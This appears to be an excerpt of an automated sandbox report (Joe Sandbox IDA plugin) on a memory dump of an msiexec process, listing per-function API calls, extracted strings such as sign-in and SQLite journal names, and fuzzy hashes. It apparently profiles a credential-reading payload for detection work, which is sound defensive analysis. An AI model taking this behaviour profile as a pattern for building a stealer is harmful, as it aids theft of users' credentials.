                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                              • memset.MSVCRT ref: 0041BA3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                              • memset.MSVCRT ref: 00405E33
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLastSleep$free
                                                              • String ID:
                                                              • API String ID: 1470729244-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <%s>, xrefs: 004100A6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
